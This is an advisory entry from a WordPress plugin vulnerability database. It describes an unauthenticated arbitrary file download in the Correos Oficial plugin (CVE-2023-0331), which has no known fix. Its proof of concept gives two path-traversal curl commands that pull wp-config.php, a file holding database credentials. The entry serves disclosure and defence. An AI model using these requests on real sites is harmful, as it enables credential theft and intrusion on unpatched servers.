WordPress Plugin Vulnerabilities

Correos Oficial <= 1.3.0.0 - Unauthenticated Arbitrary File Download

Description

The plugin does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.

Proof of Concept

Dependency: WooCommerce plugin

Use the following curl command to download the contents of the wp-config.php file:

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=../../..&filename=wp-config.php' 

or

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=..&filename=/../../wp-config.php'

Affects Plugins

Plugin icon
correosoficial
No known fix

References

CVE
CVE-2023-0331

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Andrea Iodice
Submitter
Andrea Iodice
Verified
Yes
WPVDB ID
1b4dbaf3-1364-4103-9a7b-b5a1355c685b

Timeline

Publicly Published
2023-01-31 (about 10 months ago)
Added
2023-01-31 (about 10 months ago)
Last Updated
2023-02-01 (about 10 months ago)

Other

Published
Title
Published
2022-12-05
Title
Welcart e-Commerce < 2.8.5 - Unauthenticated Arbitrary File Access
Published
2022-01-06
Title
RVM - Responsive Vector Maps < 6.4.2 - Subscriber+ Arbitrary File Read
Published
2023-07-20
Title
Jupiter X Core <= 2.5.0 - Unauthenticated Arbitrary File Download
Published
2022-08-01
Title
Lana Downloads Manager < 1.8.0 - Contributor+ Arbitrary File Download
Published
2022-11-28
Title
Wholesale Market for WooCommerce < 1.0.8 - Admin+ Arbitrary File Download